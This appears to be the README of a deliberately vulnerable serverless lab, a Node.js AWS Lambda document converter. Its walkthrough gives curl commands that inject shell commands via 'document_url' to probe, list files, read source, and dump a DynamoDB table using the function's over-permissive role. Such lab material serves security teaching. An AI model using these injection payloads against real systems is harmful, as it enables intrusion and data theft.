This is a simple Node.js AWS Lambda function that has several vulnerabilities and weaknesses. The function receives a URL to a .doc file as input, and converts it to plain text. The attack process starts by blind probing for a command injection, exploiting the remote command execution vulnerability (through a shell process), and then exploiting the over-permissive role assigned to the function, in order to grab all the information in the DynamoDB table.
- Clone the repo
- Make sure you have the Serverless framework installed, and use
sls deploy
- Normal execution flow:
curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode ""
- Blind probing for remote command execution:
curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode "document_url=; sleep 10 #"
- Exploitation to read the contents of the /var/task directory:
curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode "document_url=; ls #"
- Retrieve the function's source code:
curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode "document_url=; cat handler.js #"
- Extract all the sensitive data from the DynamoDB table:
curl -G https://API_GATEWAY_URL/dev/convert --data-urlencode "document_url=; node -e 'const AWS = require(\"aws-sdk\"); (async () => {console.log(await new AWS.DynamoDB.DocumentClient().scan({TableName: process.env.TABLE_NAME}).promise());})();' # "